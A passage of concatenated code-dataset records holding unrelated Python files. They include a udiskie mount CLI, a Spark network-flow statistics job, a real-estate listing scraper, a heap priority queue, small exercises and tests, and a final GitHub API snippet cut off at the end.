udiskie.automount.AutoMounter(mounter)\n daemon.connect(automount)\n\n mounter.mount_all()\n try:\n return mainloop.run()\n except KeyboardInterrupt:\n return 0\n\ndef mount(args=None, udisks=None):\n \"\"\"\n Execute the mount command.\n \"\"\"\n import udiskie.mount\n import udiskie.prompt\n\n parser = mount_program_options()\n parser.add_option('-a', '--all', action='store_true',\n dest='all', default=False,\n help='mount all present devices')\n options, posargs = parser.parse_args(args)\n logging.basicConfig(level=options.log_level, format='%(message)s')\n\n # for now: just use the default udisks\n if udisks is None:\n import dbus\n bus = dbus.SystemBus()\n udisks = connect_udisks(bus)\n\n # create a mounter\n prompt = udiskie.prompt.password(options.password_prompt)\n filter = load_filter(options.filters)\n mounter = udiskie.mount.Mounter(filter=filter, prompt=prompt, udisks=udisks)\n\n # mount all present devices\n if options.all:\n mounter.mount_all()\n return 0\n\n # only mount the desired devices\n elif len(posargs) > 0:\n mounted = []\n for path in posargs:\n device = mounter.mount(path)\n if device:\n mounted.append(device)\n # automatically mount luks holders\n for device in mounted:\n mounter.mount_holder(device)\n return 0\n\n # print command line options\n else:\n parser.print_usage()\n return 1\n\ndef umount(args=None, udisks=None):\n \"\"\"\n Execute the umount command.\n \"\"\"\n import udiskie.mount\n\n parser = common_program_options()\n parser.add_option('-a', '--all', action='store_true',\n dest='all', default=False,\n help='all devices')\n parser.add_option('-e', '--eject', action='store_true',\n dest='eject', default=False,\n help='Eject drive')\n parser.add_option('-d', '--detach', action='store_true',\n dest='detach', default=False,\n help='Detach drive')\n (options, posargs) = parser.parse_args(args)\n logging.basicConfig(level=options.log_level, format='%(message)s')\n\n if len(posargs) == 0 and not options.all:\n parser.print_usage()\n return 1\n\n # for now: use udisks v1 service\n if udisks is None:\n import dbus\n bus = dbus.SystemBus()\n udisks = connect_udisks(bus)\n mounter = udiskie.mount.Mounter(udisks=udisks)\n\n unmounted = []\n if options.all:\n if options.eject or options.detach:\n if options.eject:\n mounter.eject_all()\n if options.detach:\n mounter.detach_all()\n else:\n unmounted = mounter.unmount_all()\n else:\n unmounted = []\n for path in posargs:\n if options.eject or options.detach:\n path = os.path.normpath(path)\n if options.eject:\n mounter.eject(path, force=True)\n if options.detach:\n mounter.detach(path, force=True)\n else:\n device = mounter.unmount(os.path.normpath(path))\n if device:\n unmounted.append(device)\n\n # automatically lock unused luks slaves of unmounted devices\n for device in unmounted:\n mounter.lock_slave(device)\n return 0\n\n","sub_path":"udiskie/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":7723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"292934598","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/will/projects/moya/moya/moyaexceptions.py\n# Compiled at: 2015-09-01 07:17:44\nfrom __future__ import unicode_literals\nfrom .compat import implements_to_string\nfrom . import diagnose\nfrom .interface import AttributeExposer\n__all__ = [\n b'MoyaException',\n b'FatalMoyaException',\n b'throw']\n\n@implements_to_string\nclass MoyaException(Exception, AttributeExposer):\n fatal = False\n __moya_exposed_attributes__ = [\n b'type', b'msg', b'info', b'diagnosis']\n\n def __init__(self, type, msg, diagnosis=None, info=None):\n self.type = type\n self.msg = msg\n self._diagnosis = diagnosis\n self.info = info or {}\n\n @property\n def diagnosis(self):\n return self._diagnosis or diagnose.diagnose_moya_exception(self)\n\n def __str__(self):\n return (b'{}: {}').format(self.type, self.msg)\n\n def __repr__(self):\n return b'' % (self.type, self.msg)\n\n def __moyaconsole__(self, console):\n from . import pilot\n console(self.type + b': ', fg=b'red', bold=True)(self.msg).nl()\n if self.info:\n console.obj(pilot.context, self.info)\n\n\nclass FatalMoyaException(MoyaException):\n fatal = True\n\n\ndef throw(type, msg, diagnosis=None, info=None):\n raise MoyaException(type, msg, diagnosis=diagnosis, info=info)","sub_path":"pycfiles/moya-0.6.20-py2.py3-none-any/moyaexceptions.py","file_name":"moyaexceptions.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"539574077","text":"# -*- coding: utf-8 -*-\n\n#\n# MIT License\n#\n# Copyright (c) 2016 Tomas Jirsik \n# Institute of Computer Science, Masaryk University\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n#\n\"\"\"\nDescription: A method for computing statistics for hosts in network. Computed statistics\nfor each host each window are following:\n - sum of flows, packets and bytes\n - average duration of flows\n - number of distinct destination ports\n - number of distinct communication peers\n\nUsage:\n detection_ddos.py -iz : -it -oh\n : -net \n\n To run this on the Stream4Flow, you need to receive flows by IPFIXCol and make them available via Kafka topic. Then\n you can run the example\n $ ./run-application.sh ./host_statistics/host_statistics.py -iz producer:2181 -it ipfix.entry -oh consumer:20101 -net \"10\\.10\\..+\"\n\n\"\"\"\n\nimport sys # Common system functions\nimport os # Common operating system functions\nimport argparse # Arguments parser\nimport ujson as json # Fast JSON parser\nimport socket # Socket interface\nimport re # Parsing and matching regular expression\nimport time # Time handling\n\nfrom termcolor import cprint # Colors in the console output\n\nfrom pyspark import SparkContext # Spark API\nfrom pyspark.streaming import StreamingContext # Spark streaming API\nfrom pyspark.streaming.kafka import KafkaUtils # Spark streaming Kafka receiver\n\n\ndef map_tcp_flags(bitmap):\n \"\"\"\n Maps text names of tcp flags to values in bitmap\n\n :param bitmap: array[8]\n :return: dictionary with keynames as names of the flags\n \"\"\"\n result = dict()\n result[\"FIN\"] = bitmap[7]\n result[\"SYN\"] = bitmap[6]\n result[\"RST\"] = bitmap[5]\n result[\"PSH\"] = bitmap[4]\n result[\"ACK\"] = bitmap[3]\n result[\"URG\"] = bitmap[2]\n result[\"ECE\"] = bitmap[1]\n result[\"CRW\"] = bitmap[0]\n return result\n\n\ndef decimal_to_bitmap(decimal):\n \"\"\"\n Trasfers decimal number into a 8bit bitmap\n\n :param decimal: decimal number\n :return: bitmap of 8bits\n \"\"\"\n bitmap = map(int, list('{0:08b}'.format(decimal)))\n return bitmap\n\n\ndef send_data(data, output_host):\n \"\"\"\n Send given data to the specified host using standard socket interface.\n\n :param data: data to send\n :param output_host: data receiver in the \"hostname:port\" format\n \"\"\"\n\n # Split outputHost hostname and port\n host = output_host.split(':')\n\n # Prepare a TCP socket.\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n # Connect to the outputHost and send given data\n try:\n sock.connect((host[0], int(host[1])))\n sock.send(data)\n\n # Print message of sent\n now = time.strftime(\"%c\")\n print(\"Data sent at: %s\" % now)\n\n except socket.error:\n cprint(\"[warning] Unable to connect to host \" + output_host, \"blue\")\n finally:\n sock.close()\n\n\ndef process_results(json_rrd, output_host):\n \"\"\"\n Transform given computation results into the JSON format and send them to the specified host.\n\n JSON format:\n {\"src_ipv4\":\"\",\n \"@type\":\"host_stats\",\n \"stats\":{\n \"total\":{\"packets\":<# of packets>,\"bytes\":# of bytes,\"flow\":<# of flows>},\n \"avg_flow_duration\":,\n \"dport_count\":,\n \"peer_number\":\n \"tcp_flags\":{\"FIN\":, \"SYN\":, ...}\n }\n }\n\n :param json_rrd: Map in following format (src IP , (('total_stats', <# of flows>, <# of packets>, <# of bytes>),\n ('peer_number', <# of peers>),\n ('dport_count', <# number of distinct ports>),\n ('avg_flow_duration',),\n ('tcp_flags',)\n )\n )\n :param output_host: results receiver in the \"hostname:port\" format\n :return:\n \"\"\"\n\n results = \"\"\n\n for ip, data in json_rrd.iteritems():\n\n total_dict = {}\n stats_dict = {\"total\": total_dict}\n result_dict = {\"@type\": \"host_stats\", \"src_ipv4\": ip, \"stats\": stats_dict}\n\n # Process total stats\n total_dict[\"flow\"] = data[statistics_position[\"total_stats\"]][total_stats_position[\"total_flows\"]]\n total_dict[\"packets\"] = data[statistics_position[\"total_stats\"]][total_stats_position[\"total_packets\"]]\n total_dict[\"bytes\"] = data[statistics_position[\"total_stats\"]][total_stats_position[\"total_bytes\"]]\n\n # Process peer_number stats\n stats_dict[\"peer_number\"] = data[statistics_position[\"peer_number\"]][peer_number_position[\"peer_number\"]]\n\n # Process dport_number stats\n stats_dict[\"dport_count\"] = data[statistics_position[\"dport_count\"]][dport_count_position[\"dport_number\"]]\n\n # Process average flow duration stats\n stats_dict[\"avg_flow_duration\"] = data[statistics_position[\"average_flow_duration\"]][avg_flow_duration_postion[\"avg_duration\"]]\n\n # Process tcp flags sums\n if data[statistics_position[\"tcp_flags\"]]: # if exists statistics for a given host\n stats_dict[\"tcp_flags\"] = map_tcp_flags(data[statistics_position[\"tcp_flags\"]][tcp_flags_position[\"tcp_flags_array\"]])\n\n results += json.dumps(result_dict) + \"\\n\"\n\n # Sent results to a given socket\n # print(results) # Controll print\n send_data(results, output_host)\n\n\ndef count_host_stats(flow_json):\n \"\"\"\n Main function to count TOP N statistics for flow data in the JSON format.\n\n :type flow_json: Initialized spark streaming context, windowed, json_loaded.\n \"\"\"\n\n # Create regex for monitored network\n local_ip_pattern = re.compile(network_filter)\n\n # Filter flows with relevant keys\n flow_with_keys = flow_json.filter(lambda json_rdd: (\"ipfix.sourceIPv4Address\" in json_rdd.keys()) and\n (\"ipfix.destinationTransportPort\" in json_rdd.keys()) and\n (\"ipfix.flowStartMilliseconds\" in json_rdd.keys()) and\n (\"ipfix.flowEndMilliseconds\" in json_rdd.keys()) and\n (\"ipfix.protocolIdentifier\" in json_rdd.keys()) and\n (re.match(local_ip_pattern, json_rdd[\"ipfix.sourceIPv4Address\"]))\n )\n\n # Set window and slide duration for flows analysis\n flow_with_keys_windowed = flow_with_keys.window(window_duration, window_slide)\n\n # Compute basic hosts statistics - number of flows, packets, bytes sent by a host\n flow_ip_total_stats_no_window = flow_with_keys.map(lambda json_rdd: (json_rdd[\"ipfix.sourceIPv4Address\"], (\"total_stats\", 1, json_rdd[\"ipfix.packetDeltaCount\"], json_rdd[\"ipfix.octetDeltaCount\"])))\\\n .reduceByKey(lambda actual, update: (\n actual[total_stats_position[\"type\"]],\n actual[total_stats_position[\"total_flows\"]] + update[total_stats_position[\"total_flows\"]],\n actual[total_stats_position[\"total_packets\"]] + update[total_stats_position[\"total_packets\"]],\n actual[total_stats_position[\"total_bytes\"]] + update[total_stats_position[\"total_bytes\"]]\n ))\n\n flow_ip_total_stats = flow_ip_total_stats_no_window.window(window_duration, window_slide)\\\n .reduceByKey(lambda actual, update: (\n actual[total_stats_position[\"type\"]],\n actual[total_stats_position[\"total_flows\"]] + update[total_stats_position[\"total_flows\"]],\n actual[total_stats_position[\"total_packets\"]] + update[total_stats_position[\"total_packets\"]],\n actual[total_stats_position[\"total_bytes\"]] + update[total_stats_position[\"total_bytes\"]]\n ))\n\n # Compute a number of distinct communication peers with a host\n flow_communicating_pairs_no_window = flow_with_keys.map(lambda json_rdd: ((json_rdd[\"ipfix.sourceIPv4Address\"], json_rdd[\"ipfix.sourceIPv4Address\"]+\"-\"+json_rdd[\"ipfix.destinationIPv4Address\"]), 1))\\\n .reduceByKey(lambda actual, update: actual)\n\n flow_communicating_pairs = flow_communicating_pairs_no_window.window(window_duration, window_slide) \\\n .reduceByKey(lambda actual, update: actual + update)\\\n .map(lambda json_rdd: (json_rdd[0][0], (\"peer_number\", 1)))\\\n .reduceByKey(lambda actual, update: (\n actual[0],\n actual[1] + update[1]))\n\n # Compute a number of distinct destination ports for each host\n flow_dst_port_count_no_window = flow_with_keys_windowed.map(lambda json_rdd: ((json_rdd[\"ipfix.sourceIPv4Address\"], json_rdd[\"ipfix.sourceIPv4Address\"]+\"-\"+str(json_rdd[\"ipfix.destinationTransportPort\"])), 1))\\\n .reduceByKey(lambda actual, update: actual)\n flow_dst_port_count = flow_dst_port_count_no_window.window(window_duration, window_slide) \\\n .reduceByKey(lambda actual, update: actual)\\\n .map(lambda json_rdd: (json_rdd[0][0], (\"dport_count\", 1)))\\\n .reduceByKey(lambda actual, update: (\n actual[0],\n actual[1] + update[1]))\n\n # Compute an average duration of a flow in seconds for each host\n flow_average_duration = flow_with_keys_windowed.map(lambda json_rdd: (json_rdd[\"ipfix.sourceIPv4Address\"], (1, (json_rdd[\"ipfix.flowEndMilliseconds\"]-json_rdd[\"ipfix.flowStartMilliseconds\"]))))\\\n .reduceByKey(lambda actual, update: (\n actual[0] + update[0], # number of flow\n actual[1] + update[1] # sum of flow duration\n ))\\\n .map(lambda json_rdd: (json_rdd[0], (\"avg_flow_duration\", (json_rdd[1][1]/float(1000))/float(json_rdd[1][0])))) # compute the average\n\n # Compute TCP Flags\n # Filter out TCP traffic\n flow_tcp = flow_with_keys.filter(lambda json_rdd: (json_rdd[\"ipfix.protocolIdentifier\"] == 6))\n # Compute flags statistics\n flow_tcp_flags_no_window = flow_tcp.map(lambda json_rdd: (json_rdd[\"ipfix.sourceIPv4Address\"], (\"tcp_flags\", decimal_to_bitmap(json_rdd[\"ipfix.tcpControlBits\"]))))\\\n .reduceByKey(lambda actual, update: (\n actual[0],\n [x + y for x, y in zip(actual[1], update[1])]\n ))\n\n flow_tcp_flags = flow_tcp_flags_no_window.window(window_duration, window_slide)\\\n .reduceByKey(lambda actual, update: (\n actual[0],\n [x + y for x, y in zip(actual[1], update[1])]\n ))\n\n # Union the DStreams to be able to process all in one foreachRDD\n # The structure of DSstream is\n # (src IP, ((((('total_stats', <# of flows>, <# of packets>, <# of bytes>), ('peer_number', <# of peers>)),\n # ('dport_count', <# number of distinct ports>)),\n # ('avg_flow_duration', )),\n # ('tcp_flags',))\n # )\n union_stream = flow_ip_total_stats.fullOuterJoin(flow_communicating_pairs)\\\n .fullOuterJoin(flow_dst_port_count)\\\n .fullOuterJoin(flow_average_duration)\\\n .fullOuterJoin(flow_tcp_flags)\n\n # Transform union_stream to parsable Dstream\n # (src IP , (('total_stats', <# of flows>, <# of packets>, <# of bytes>), ('peer_number', <# of peers>),\n # ('dport_count', <# number of distinct ports>), ('avg_flow_duration',),(\"tcp_flags\",)))\n parsable_union_stream = union_stream.map(lambda json_rdd: (json_rdd[0], (json_rdd[1][0][0][0][0], json_rdd[1][0][0][0][1], json_rdd[1][0][0][1], json_rdd[1][0][1], json_rdd[1][1])))\n\n return parsable_union_stream\n\n\nif __name__ == \"__main__\":\n # Prepare arguments parser (automatically creates -h argument).\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-iz\", \"--input_zookeeper\", help=\"input zookeeper hostname:port\", type=str, required=True)\n parser.add_argument(\"-it\", \"--input_topic\", help=\"input kafka topic\", type=str, required=True)\n parser.add_argument(\"-oh\", \"--output_host\", help=\"output hostname:port\", type=str, required=True)\n parser.add_argument(\"-net\", \"--network_range\", help=\"network range to watch\", type=str, required=True)\n\n # Parse arguments.\n args = parser.parse_args()\n\n # Set variables\n application_name = os.path.basename(sys.argv[0]) # Application name used as identifier\n kafka_partitions = 1 # Number of partitions of the input Kafka topic\n window_duration = 10 # Analysis window duration (10 seconds)\n window_slide = 10 # Slide interval of the analysis window (10 seconds)\n network_filter = args.network_range # Filter for network for detection (regex filtering), e.g. \"10\\.10\\..+\"\n\n # Spark context initialization\n sc = SparkContext(appName=application_name + \" \" + \" \".join(sys.argv[1:])) # Application name used as the appName\n ssc = StreamingContext(sc, 1) # Spark microbatch is 1 second\n\n # Position of statistics in DStream.\n # Overall structure of a record\n statistics_position = {\"total_stats\": 0, \"peer_number\": 1, \"dport_count\": 2, \"average_flow_duration\": 3, \"tcp_flags\": 4}\n # Structure of basic characteristics\n total_stats_position = {\"type\": 0, \"total_flows\": 1, \"total_packets\": 2, \"total_bytes\": 3}\n # Structure of peer number count characteristics\n peer_number_position = {\"type\": 0, \"peer_number\": 1}\n # Structure of destination port count characteristics\n dport_count_position = {\"type\": 0, \"dport_number\": 1}\n # Structure of average flow duration characteristics\n avg_flow_duration_postion = {\"type\": 0, \"avg_duration\": 1}\n # Structure of protocol characteristics\n tcp_flags_position = {\"type\": 0, \"tcp_flags_array\": 1}\n\n # Initialize input DStream of flows from specified Zookeeper server and Kafka topic\n input_stream = KafkaUtils.createStream(ssc, args.input_zookeeper, \"spark-consumer-\" + application_name, {args.input_topic: kafka_partitions})\n\n # Parse flows in the JSON format\n input_stream_json = input_stream.map(lambda x: json.loads(x[1]))\n\n # Process data to the defined function.\n host_statistics = count_host_stats(input_stream_json)\n\n # Process computed statistics and send them to the specified host\n host_statistics.foreachRDD(lambda rdd: process_results(rdd.collectAsMap(), args.output_host))\n\n # Start input data processing\n ssc.start()\n ssc.awaitTermination()\n\n\n","sub_path":"applications/statistics/hosts_statistics/spark/host_stats.py","file_name":"host_stats.py","file_ext":"py","file_size_in_byte":17422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"623262581","text":"# Task 6 =================================================================================\n\n# ТЗ: Даны входные данные (номера страховых полисов клиентов двух больних (списки):\n# Alchemilla Hospital и Brookhaven Hospital).\n# Нужно выяснить:\n# 1. Сколько клиентов посещают обе больницы\n# 2. Сколько клиентов посещают только больницу Alchemilla Hospital\n# 3. Сколько клиентов (уникальных страховых полисов) находится в базах данных всех больниц\n# Input data: al_hospital = [123, 4325, 3567, 234, 54647, 5663]\n# Input data: bh_hospital = [688, 5653, 123, 56778, 234, 4677, 8787]\n# # To solve with and without sets\n\n# Developer notes: Решить не применяя set ! :)\n# ========================================================================================\n\nal_hospital = [123, 4325, 3567, 234, 54647, 5663]\nbh_hospital = [688, 5653, 123, 56778, 234, 4677, 8787]\n\nboth_hospitals = 0 # Hom many clients visit both hospitals\nonly_al_hospital = 0 # How many clients only in Alchemilla Hospital\nonly_bh_hospital = 0 # How many client only in Brookhaven Hospital\n\nfor a in al_hospital:\n for b in bh_hospital:\n if a == b:\n both_hospitals += 1\n else:\n continue\n\nprint(f\"{both_hospitals} clients visit both hospitals\")\n\nfor a in al_hospital:\n if a not in bh_hospital:\n only_al_hospital += 1\n else:\n continue\n\nprint(f\"{only_al_hospital} clients visit only 'Alchemilla' hospital\")\n\nfor b in bh_hospital:\n if b not in al_hospital:\n only_bh_hospital += 1\n else:\n continue\n\nprint(f\"{only_al_hospital + both_hospitals + only_bh_hospital} unique visitors of both hospitals\")\n","sub_path":"HomeWork_03_04.02.2021/HomeTask_06.py","file_name":"HomeTask_06.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"554106642","text":"#======================================================================\n#\n# This routine interfaces with Gaussian Process Regression\n# The crucial part is\n#\n# y[iI] = solver.initial(Xtraining[iI], n_agents)[0]\n# => at every training point, we solve an optimization problem\n#\n# Simon Scheidegger, 01/19\n#======================================================================\n\nimport numpy as np\nimport logging\nlogger = logging.getLogger(__name__)\nlogger.write = lambda msg: logger.info(msg.decode('utf-8')) if msg.strip(\n) != '' else None\nimport pickle\n\nfrom . import solver_ipopt as solver\nfrom utils import stdout_redirector\nfrom estimator.gpr import GPR\n\n\ndef VFI_iter(model, V_tp1=None, num_samples = 20):\n logger.info(\"Beginning VFI Step\")\n\n #fix seed\n np.random.seed(666)\n\n #generate sample aPoints\n dim = model.dim.state\n Xtraining = np.random.uniform(model.params.k_bar, model.params.k_up,\n (num_samples, dim))\n y = np.zeros(num_samples, float) # training targets\n\n # solve bellman equations at training points\n # with stdout_redirector(logger):\n for iI in range(len(Xtraining)):\n y[iI] = solver.solve(model, Xtraining[iI], V_tp1=V_tp1)[0]\n\n # Instantiate a Gaussian Process model\n # Fit to data using Maximum Likelihood Estimation of the parameters\n V_t = GPR()\n V_t.fit(Xtraining, y)\n\n logger.info(\"Finished VFI Step\")\n\n return V_t\n","sub_path":"solver/gpr_continuous.py","file_name":"gpr_continuous.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"124171592","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport boto3\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom urllib.request import urlretrieve\nfrom os.path import join\nimport time\n\n\ndynamodb = boto3.resource('dynamodb')\ntable = dynamodb.Table('ut-ksl2')\n#s3 = boto3.client('s3')\n#s3.upload_fileobj(file_object, 'ut-ksl-images', 'myKey') \n\nimageDir = r'C:\\Users\\matt\\Desktop\\Houses\\ut-ksl-images'\n\n\n#\n#ses = temp.get_item(Key={'address':'123 Sesame St. Sandy UT 84070'})\n#\n#ses = temp.put_item(Item = {'address':'123 Sesame St. Sandy UT 84070','attempt':3})\n#\n#ses = temp.update_item(Key={'address':'123 Sesame St. Sandy UT 84070'},\n# UpdateExpression = 'SET price = :price, description = :description',\n# ExpressionAttributeValues={':price':300000,\n# ':description':'rancher'})\n#\n#\n#UpdateExpression='SET age = :val1',\n# ExpressionAttributeValues={\n# ':val1': 26\n# \n\ndef get(url,session):\n time.sleep(3)\n return session.get(url)\n\ndef getListingIdsOnPage(page):\n 'Get a list of the KSL listing identifiers on the current page of search results.'\n pageSoup = BeautifulSoup(page,'html.parser')\n listingGroups = pageSoup.find_all('div', {'class':'listing-group'})\n urls = []\n for lg in listingGroups:\n urls += [l.find('a').get('href') for l in lg.find_all('div',{'class':'listing'})]\n return [int(listingId) for listingId in re.findall(pattern='/homes/listing/(\\d+)',string=' '.join(urls))]\n\n \ndef parseListing(listingId,session): \n 'Requests the page for the specified listing and returns a dict containing all the details of that listing'\n listingDict = {'listingId':listingId}\n try:\n response = get('http://www.ksl.com/homes/listing/{}'.format(listingId),s)\n if response.status_code == 200:\n listing = response.text\n soup = BeautifulSoup(listing,'html.parser')\n \n #Parse details at top of page.\n listingDetails = soup.find('div', {'class':'listing-details'})\n listingDict.update({i['class'][0]:' '.join(i.text.strip().split()) for i in listingDetails.children if str(i).strip()})\n listingDict['price'] = listingDict['price'].replace('$','').replace(',','')\n \n # Parse Property Details Table \n for row in soup.findAll(\"table\", { \"class\" : \"details-list\" }):\n cells = row.find_all('td')\n for cell in cells:\n cellData = cell.string\n try: #Ignores completely open cells\n if cellData[0] != '\\n': #This is an actual data cell\n if cellData[-1] == ':': #Dictionary key\n key = cellData.replace(' ','').replace(':','')\n else:\n value = cellData.replace(',','')\n try:\n value = int(value)\n except ValueError:\n pass\n if value not in ['None Specified','Not Specified','Not Applicable']:\n listingDict[key] = value\n except TypeError:\n continue \n \n listingDict['contact-name'] = soup.find('span', {'class':'contact-name'}).text\n company = soup.find('span', {'class':'contact-company'}).text.strip()\n if company:\n listingDict['contact-company'] = company\n \n listingDict['description'] = soup.find('p', {'class':'body--text'}).text\n \n # Save images for listing to a local file. I'll later zip up and send them to s3.\n try: \n image = soup.find('div',{'class':'static-photo-image-container media'}).find('img')['src']\n urlretrieve('https:' + image, join(imageDir,str(listingId) + image[image.rfind('.'):]))\n except Exception:\n print('No picture found for listing {}'.format(listingId))\n pass\n return {k: v for k, v in listingDict.items() if v} # Removes dictionary entries if the values is an empty string because this causes a problem with DynamoDb import\n \n else: # Response code not 200\n return None\n except Exception:\n print('Encountered Exception on listing {}'.format(listingId))\n return None\n \n \n \ns = requests.Session()\nsearchUrl = 'http://www.ksl.com/homes/search/index?city=&state=&zip=84043&miles=50&category%5B%5D=Homes+For+Sale&priceFrom=100000&priceTo=700000&bedFQ%5B%5D=&bathFQ%5B%5D=&squareFootFQ%5B%5D=&parkingAttachedGarageFQ%5B%5D=&parkingDetachedGarageFQ%5B%5D=&parkingCarportFQ%5B%5D=&yearFrom=&yearTo=&acreFQ%5B%5D=&keyword='\n\npage = get(searchUrl,s).text\nlastPageNum = BeautifulSoup(page, 'html.parser').find('a', { 'title' : 'Go to last page' })['href'].split('=')[1]\nlistingIds = getListingIdsOnPage(page)\n\nfor pageNum in range(1,int(lastPageNum)):\n try:\n# print('Processing page {}'.format(pageNum)) # Debug\n print('Processing search page {} of {}'.format(pageNum,lastPageNum)) # Debug\n page = get('http://www.ksl.com/homes/search/index?page={}'.format(pageNum),s).text\n listingIds = listingIds + getListingIdsOnPage(page)\n except ConnectionError:\n print('Encountered connection error on {}'.format(pageNum))\n \nlistingIdList = list(listingIds)\n\nprint('Found {} listings to scrape'.format(len(listingIdList)))\n\nwith table.batch_writer() as batchWriter:\n for listingId in listingIdList:\n# print('Processing listing: ' + str(listingId)) # Debug\n item = parseListing(listingId,s)\n if item is not None:\n batchWriter.put_item(Item=item)\n else:\n print(\"Couldn't access item {}\".format(listingId))\n","sub_path":"realEstateScraper.py","file_name":"realEstateScraper.py","file_ext":"py","file_size_in_byte":6054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"603782327","text":"from testsuite.base_testcase import BaseTestCase\nfrom pageobjects.forum_homepage import HomePage\nfrom pageobjects.forum_searchpage import SearchPage\nfrom pageobjects.base import BasePage\nimport unittest\nimport time\nclass SearchTest(BaseTestCase,BasePage):\n def test_search(self):\n home_page=HomePage(self.driver)\n home_page.submit('admin', '13333486358LY')\n time.sleep(3)\n search_page=SearchPage(self.driver)\n search_page.search(\"la\")\n\n base=BasePage(self)\n text=base.get_text(*search_page.search_page_button_search_title_loc)\n self.assertEqual(text,\"la\",msg=\"failed\")\n search_page.logout()\n time.sleep(4)\n\nif __name__==\"__main__\":\n unittest.main()","sub_path":"testsuite/test_search.py","file_name":"test_search.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"105454917","text":"\"\"\"\n\n\"\"\"\nfrom chapterNine.HeapPriorityQueue import HeapPriorityQueue\n\nclass AdaptableHeapPriorityQueue(HeapPriorityQueue):\n\n\n class Locator(HeapPriorityQueue._Item):\n\n __slots__ = '_index'\n\n # override the _Item inner class, pass key val to base constructor,\n # initialize instance variable index from subclass constructor arg j\n def __init__(self, k, v, j):\n super().__init__(k, v)\n self._index = j\n\n\n # ------------------------- Non Public Behavior ------------------------- #\n\n def _swap(self, i, j):\n \"\"\"\n called from parent class upheap, performs parent class super.swap,\n then resets the index of the locator, which the client will have in similar score\n so the instance will be updated\n :param i:\n :param j:\n :return:\n \"\"\"\n super()._swap(i, j)\n self._data[i]._index = i # reset locator index\n self._data[j]._index = j # reset locator index\n\n def _bubble(self, j):\n \"\"\"\n\n :param j:\n :return:\n \"\"\"\n # bubble the locator up or down in the array\n print('in bubble')\n if j > 0 and self._data[j] < self._data[self._parent(j)]:\n self._upheap(j)\n else:\n self._downheap(j)\n\n # ------------------------- Public Behavior ------------------------- #\n\n def add(self, key, val):\n \"\"\"\n time complexity -> worst case O(log n)\n add a key value pair\n :param key:\n :param val:\n :return:\n \"\"\"\n # adds Locator to the end of the list and performs the upheap, which in which calls the overriden swap\n token = self.Locator(key, val, len(self._data))\n self._data.append(token)\n self._upheap(len(self._data) - 1) # where the token was placed, upheap it until it satisfies the heap order principel\n return token\n\n def update(self, loc, newkey, newval):\n \"\"\"\n update the key and value for the entry identified by the Locator loc\n :param loc:\n :param newkey:\n :param newval:\n :return:\n \"\"\"\n j = loc._index\n # if loc index is less than zero, there is no length, or the loc\n # at the provided index is not the same as the locator provided,\n # toss an error\n if not (0 <= j < len(self) and self._data[j] is loc):\n raise ValueError(\"invalid location error\")\n loc._key = newkey\n loc._value = newval\n self._bubble(j)\n\n def remove(self, loc):\n \"\"\"\n remove and return the (k, v) pair identified by the Locator loc\n :param loc:\n :return:\n \"\"\"\n j = loc._index\n if not (0 <= j < len(self) and self._data[j] is loc):\n raise ValueError(\"invalid location instance provided for heap\")\n # if the indexi the the last element in the array as the storage, just pop it. this would be\n # right most bottom level element in the heap\n if j == len(self) - 1:\n self._data.pop()\n else:\n self._swap(j, len(self) - 1) # swap item to the last position\n self._data.pop() # pop it off\n self._bubble(j) # fix item displaced by the swap which is at index j\n return loc._key, loc._value\n\n\n\n\ntest = AdaptableHeapPriorityQueue()\n\nfirst = test.add(5, \"test\")\nprint(first._index)\nsecond = test.add(2, \"next time\")\nprint(second._index)\nprint(first._index)\n\n","sub_path":"chapterNine/AdaptableHeapPriorityQueue.py","file_name":"AdaptableHeapPriorityQueue.py","file_ext":"py","file_size_in_byte":3468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"388709007","text":"import requests\nimport threading\nimport os\n\nclass GithubRequestThread:\n def __init__(self, username):\n self.username = username\n\n self.thread = threading.Thread(target=self.run, args=())\n self.thread.daemon = True\n self.thread.start()\n\n def run(self):\n r = requests.get('https://api.github.com/users/%s' % self.username)\n result = r.json()\n\n print(\"RESULT: \"+result[\"name\"])\n print(\"RESULT: \"+result[\"location\"])\n\n\nthreads = [\n 